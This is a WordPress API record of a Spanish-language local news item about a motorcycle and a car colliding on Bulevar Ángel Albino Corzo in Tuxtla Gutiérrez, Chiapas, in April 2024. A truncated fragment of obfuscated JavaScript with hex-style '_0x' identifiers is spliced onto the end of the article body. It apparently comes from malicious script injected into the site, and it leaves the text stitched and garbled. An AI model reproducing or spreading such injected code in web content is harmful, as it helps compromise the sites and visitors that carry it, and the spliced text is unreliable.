{"id":15033,"date":"2024-04-10T23:54:10","date_gmt":"2024-04-10T23:54:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15033"},"modified":"2024-04-10T23:54:11","modified_gmt":"2024-04-10T23:54:11","slug":"chocan-particular-y-motociclista-en-el-bulevar-angel-albino-corzo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15033","title":{"rendered":"Chocan particular y motociclista en el Bulevar \u00c1ngel Albino Corzo"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15034\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792961641-1024x768.jpg\" alt=\"\" class=\"wp-image-15034\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792961641-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792961641-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792961641-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792961641.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15035\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792956337-1024x768.jpg\" alt=\"\" class=\"wp-image-15035\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792956337-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792956337-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792956337-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792956337.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15036\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792945807-1024x768.jpg\" alt=\"\" class=\"wp-image-15036\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792945807-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792945807-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792945807-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712792945807.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 10 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una motocicleta y una veh\u00edculo particular protagonizaron un accidente de tr\u00e1nsito este mi\u00e9rcoles por la ma\u00f1ana cuando circulaban en el Bulevar \u00c1ngel Albino Corzo en el Carril de Oriente a Poniente a la altura de la Colonia Castillo Tielmans.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una motocicleta de color negra era tripulada con direcci\u00f3n al Poniente y al llegar a un retorno el veh\u00edculo Chevrolet Optra dio vuelta en &#8220;U&#8221; haciendo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>Por el golpe el conductor de la moto sali\u00f3 volando y se estrell\u00f3 contra el pavimento y el conductor del veh\u00edculo fren\u00f3 su marcha.<\/p>\n\n\n\n<p>Al no haber una ambulancia disponible, el lesionado no fue valorado.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 10 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una motocicleta y una veh\u00edculo particular protagonizaron un accidente de tr\u00e1nsito este mi\u00e9rcoles por la ma\u00f1ana cuando circulaban en el Bulevar \u00c1ngel Albino Corzo en el Carril de Oriente a Poniente a la altura de la Colonia Castillo Tielmans. Los reportes de tr\u00e1nsito &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15034,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15033","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15033","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15033"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15033\/revisions"}],"predecessor-version":[{"id":15037,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15033\/revisions\/15037"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15034"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15033"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15033"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15033"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}